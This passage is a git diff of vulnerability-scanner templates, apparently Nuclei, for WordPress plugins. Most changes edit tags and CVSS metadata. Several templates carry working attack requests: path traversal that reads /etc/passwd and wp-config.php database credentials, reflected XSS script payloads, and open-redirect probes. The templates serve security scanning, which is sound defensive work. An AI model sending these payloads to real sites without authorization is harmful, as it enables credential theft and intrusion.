-    google-dork: inurl:wp/wp-content/force-download.php
-  tags: wordpress,wp-plugin,lfi,shortcode,wp
+    google-query: inurl:wp/wp-content/force-download.php
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin
 
 requests:
   - method: GET
@@ -29,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml
new file mode 100644
index 0000000000..04d9bb9eb8
--- /dev/null
+++ b/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml
@@ -0,0 +1,50 @@
+id: shortpixel-image-optimizer-xss
+
+info:
+  name: WordPress ShortPixel Image Optimizer <4.22.10 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress ShortPixel Image Optimizer 4.22.10 does not escape generated URLs before outputting them back in an attribute, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01
+    - https://wordpress.org/plugins/shortpixel-image-optimiser
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/options-general.php?page=wp-shortpixel-settings&"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '&\"><script>alert(1)</script>&noheader=true&sp-action'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
deleted file mode 100644
index a58df73c46..0000000000
--- a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: simple-image-manipulator-lfi
-
-info:
-  name: Simple Image Manipulator v1.0 - Remote file download
-  author: dhiyaneshDK
-  severity: high
-  description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
-  reference:
-    - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/sniplets-lfi.yaml b/vulnerabilities/wordpress/sniplets-lfi.yaml
deleted file mode 100644
index 757dff08fe..0000000000
--- a/vulnerabilities/wordpress/sniplets-lfi.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: sniplets-lfi
-
-info:
-  name: Wordpress Plugin Sniplets 1.1.2 - LFI
-  author: dhiyaneshDK
-  severity: high
-  reference:
-    - https://www.exploit-db.com/exploits/5194
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "DB_NAME"
-          - "DB_PASSWORD"
-        condition: and
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/vulnerabilities/wordpress/sniplets-xss.yaml
deleted file mode 100644
index 195e8e384f..0000000000
--- a/vulnerabilities/wordpress/sniplets-xss.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: sniplets-xss
-
-info:
-  name: Wordpress Plugin Sniplets - Cross-Site Scripting
-  author: dhiyaneshDK
-  severity: medium
-  description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
-  reference:
-    - https://www.exploit-db.com/exploits/5194
-  tags: xss,wordpress,wp-plugin,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "</script><script>alert(document.domain)</script>"
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
index ba75da6fa4..704a2ea88e 100644
--- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
+++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
@@ -7,15 +7,15 @@ info:
   description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used.
   reference:
     - https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f
-  tags: wp-plugin,redirect,wordpress
+  tags: wp-plugin,redirect,wordpress,wpscan
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/register/?redirect_to=https://example.com/"
+      - "{{BaseURL}}/register/?redirect_to=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
deleted file mode 100644
index 4e25b1b4b0..0000000000
--- a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: video-synchro-pdf-lfi
-
-info:
-  name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion
-  author: Hassan Khan Yusufzai - Splint3r7
-  severity: high
-  reference:
-    - https://www.exploit-db.com/exploits/50844
-    - https://wordpress.org/plugins/video-synchro-pdf/
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
index 5c7fdc88b3..a3801f724b 100644
--- a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
+++ b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
@@ -1,21 +1,23 @@
 id: w3c-total-cache-ssrf
 
 info:
-  name: Wordpress W3C Total Cache SSRF <= 0.9.4
+  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
   author: random_robbie
   severity: medium
-  description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
+  description: |
+    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
   reference:
     - https://wpvulndb.com/vulnerabilities/8644
     - https://klikki.fi/adv/w3_total_cache.html
-  tags: wordpress,wp-plugin,cache,ssrf
+  tags: wordpress,wp-plugin,cache,ssrf,wp
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
+
     matchers:
       - type: word
+        part: body
         words:
           - "NessusFileIncludeTest"
-        part: body
diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
index abbcd5095b..2175f30fcd 100644
--- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
+++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
@@ -12,10 +12,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ=="
+      - "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml
new file mode 100644
index 0000000000..b16d64dcae
--- /dev/null
+++ b/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml
@@ -0,0 +1,51 @@
+id: woocommerce-pdf-invoices-xss
+
+info:
+  name: WordPress WooCommerce PDF Invoices & Packing Slips <2.15.0 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress WooCommerce PDF Invoices & Packing Slips 2.15.0 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b
+    - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents&section=invoice&"><script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "><script>alert(document.domain)</script>"
+          - "WooCommerce PDF Invoices"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
index efb3cccd26..fce3ff8ba1 100644
--- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
+++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
@@ -2,7 +2,7 @@ id: wordpress-accessible-wpconfig
 
 info:
   name: WordPress wp-config Detection
-  author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
+  author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess
   severity: medium
   description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
   classification:
@@ -32,6 +32,7 @@ requests:
       - '{{BaseURL}}/wp-config.php~'
       - '{{BaseURL}}/wp-config.php-backup'
       - '{{BaseURL}}/wp-config.php.orig'
+      - '{{BaseURL}}/wp-config.php_orig'
       - '{{BaseURL}}/wp-config.php.original'
       - '{{BaseURL}}/_wpeprivate/config.json'
 
diff --git a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml
index fd1ae9b37e..853cae35b3 100644
--- a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for sensitive directories present in the bbpress wordpress plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6158
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml
index 3f1e03ab8f..8427ed4342 100644
--- a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for sensitive directories present in the elementor wordpress plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6297
-  tags: wordpress,listing,plugin
+  tags: listing,plugin,edb,wordpress
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-git-config.yaml b/vulnerabilities/wordpress/wordpress-git-config.yaml
index 0373acfeb3..2d2d71ad9a 100644
--- a/vulnerabilities/wordpress/wordpress-git-config.yaml
+++ b/vulnerabilities/wordpress/wordpress-git-config.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for the pattern /.git/config inside themes and plugins folder.
   reference:
     - https://hackerone.com/reports/248693
-  tags: config,git,exposure,wordpress,wp-plugin,wp-theme
+  tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml
index 10e417ba5c..25aac1dce8 100644
--- a/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for sensitive directories present in the gtranslate wordpress plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6160
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
index d4a0254656..3788f80a46 100644
--- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
@@ -1,14 +1,18 @@
 id: wordpress-rce-simplefilelist
 
 info:
-  name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
+  name: WordPress SimpleFilelist - Remote Code Execution
   author: princechaddha
   severity: critical
   description: |
-    The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
+    Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
   reference:
     - https://wpscan.com/vulnerability/10192
-  tags: wordpress,wp-plugin,rce,intrusive,upload,python
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
 
 requests:
   - raw:
@@ -71,3 +75,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml
index 5c849255aa..d2c9513be4 100644
--- a/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Redirection Plugin Directory Listing
   author: dhiyaneshDk
   severity: info
-  description: Searches for sensitive directories present in the wordpress-redirection plugin.
+  description: Searches for sensitive directories present in the redirection plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6436
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
index c393680936..bf208b67c2 100644
--- a/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
+++ b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
@@ -4,7 +4,11 @@ info:
   name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
   author: randomrobbie
   severity: medium
-  tags: wordpress,wp-plugin
+  description: |
+    The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
+  reference:
+    - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
+  tags: wordpress,wp-plugin,wp,unauth,wpscan
 
 requests:
   - method: GET
@@ -13,10 +17,11 @@ requests:
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - "Main URL to Post"
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "Main URL to Post"
-        part: body
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
index 6dd3f645af..f514fc1fcf 100644
--- a/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
+++ b/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
@@ -6,7 +6,7 @@ info:
   severity: high
   reference:
     - https://www.exploit-db.com/exploits/49252
-  tags: wordpress,wp-plugin
+  tags: wordpress,wp-plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml
index 844fa85bbc..dff0717418 100644
--- a/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml
+++ b/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6437
-  tags: wordpress,wp-plugin
+  tags: wp-plugin,edb,wordpress
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml
index b42a797679..133a7642a2 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for sensitive directories present in the woocommerce wordpress plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6192
-  tags: wordpress,listing,plugin,woocommerce
+  tags: edb,wordpress,listing,plugin,woocommerce
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
index 05bc6af882..ded165192a 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
@@ -1,13 +1,18 @@
 id: wordpress-wordfence-lfi
 
 info:
-  name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval
+  name: WordPress Wordfence 7.4.5 - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/48061
     - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
-  tags: wordpress,wp-plugin,lfi,wordfence
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-plugin,lfi,wordfence,edb
 
 requests:
   - method: GET
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
index b0a50a1cfe..476f3602f1 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml
@@ -1,11 +1,16 @@
 id: wordpress-wordfence-waf-bypass-xss
 
 info:
-  name: Wordpress Wordfence WAF - Cross-Site Scripting
+  name: Wordpress Wordfence - Cross-Site Scripting
   author: hackergautam
   severity: medium
+  description: Wordpress Wordfence is vulnerable to cross-site scripting.
   reference:
     - https://twitter.com/naglinagli/status/1382082473744564226
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wordfence,xss,bypass
 
 requests:
@@ -28,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
index 5ada86210a..9fc4199fee 100644
--- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
@@ -1,9 +1,14 @@
 id: wordpress-wordfence-xss
 
 info:
-  name: WordPress Wordfence 7.4.6 Cross Site Scripting
+  name: WordPress Wordfence 7.4.6 - Cross0Site Scripting
   author: madrobot
   severity: medium
+  description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,wp-plugin,xss,wordfence
 
 requests:
@@ -26,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
index 4094c066d1..254120356e 100644
--- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
@@ -1,17 +1,24 @@
 id: wordpress-zebra-form-xss
 
 info:
-  name: Wordpress Zebra Form - Cross-Site Scripting
+  name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting
   author: madrobot
   severity: medium
+  description: |
+    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php.
   reference:
     - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
-  tags: wordpress,xss
+    - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,xss,wp,wpscan
 
 requests:
   - raw:
       - |
-        POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
+        POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
         Host: {{Hostname}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
@@ -26,15 +33,17 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - "</script><img src onerror=alert(/XSS-form/)>"
         part: body
+        words:
+          - "</script><img src onerror=alert(document.domain)>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
 
       - type: status
         status:
           - 200
 
-      - type: word
-        words:
-          - "text/html"
-        part: header
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
index e78615fb51..b19431caeb 100644
--- a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
@@ -4,11 +4,11 @@ info:
   name: WordPress 123ContactForm Plugin Directory Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the 123contactform-for-wordpress plugin.
   reference:
     - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
     - https://www.exploit-db.com/ghdb/6979
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/vulnerabilities/wordpress/wp-adaptive-xss.yaml
index e6649074fb..ca94ad0d3d 100644
--- a/vulnerabilities/wordpress/wp-adaptive-xss.yaml
+++ b/vulnerabilities/wordpress/wp-adaptive-xss.yaml
@@ -1,7 +1,7 @@
 id: wp-adaptive-xss
 
 info:
-  name: WordPress Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
+  name: WordPress Adaptive Images < 0.6.69 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: high
   description: WordPress Adaptive Images < 0.6.69 is susceptible to cross-site scripting because the plugin does not sanitize and escape the REQUEST_URI before outputting it back in a page.
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cwe-id: CWE-79
-  tags: wordpress,xss,wp-plugin,wp
+  tags: wpscan,wordpress,xss,wp-plugin,wp
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-all-export-xss.yaml b/vulnerabilities/wordpress/wp-all-export-xss.yaml
new file mode 100644
index 0000000000..3eb71ebc08
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-all-export-xss.yaml
@@ -0,0 +1,52 @@
+id: wp-all-export-xss
+
+info:
+  name: WordPress All Export <1.3.6 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  metadata:
+    verified: true
+  reference:
+    - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=pmxe-admin-manage&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'manage&a\"><script>alert(1)</script>">'
+          - 'Manage Exports'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-altair-listing.yaml b/vulnerabilities/wordpress/wp-altair-listing.yaml
index d81371ddc2..3c3a1e0eda 100644
--- a/vulnerabilities/wordpress/wp-altair-listing.yaml
+++ b/vulnerabilities/wordpress/wp-altair-listing.yaml
@@ -1,28 +1,28 @@
-id: wp-altair-listing
+id: wp-altair-listing
 
-info:
-  name: Altair WordPress theme v4.8 - Directory Listing
-  author: pussycat0x
-  severity: info
-  description: Searches for directories listing in the altair theme.
-  tags: wordpress,listing,wp-theme
+info:
+  name: Altair WordPress theme v4.8 - Directory Listing
+  author: pussycat0x
+  severity: info
+  description: Searches for directories listing in the altair theme.
+  tags: wordpress,listing,wp-theme
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/themes/altair/modules/"
-      - "{{BaseURL}}/wp-content/themes/altair/functions/"
-      - "{{BaseURL}}/wp-content/themes/altair/images/flip/"
-      - "{{BaseURL}}/wp-content/themes/altair/images/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "wp-content/themes/altair"
-        condition: and
-
-      - type: status
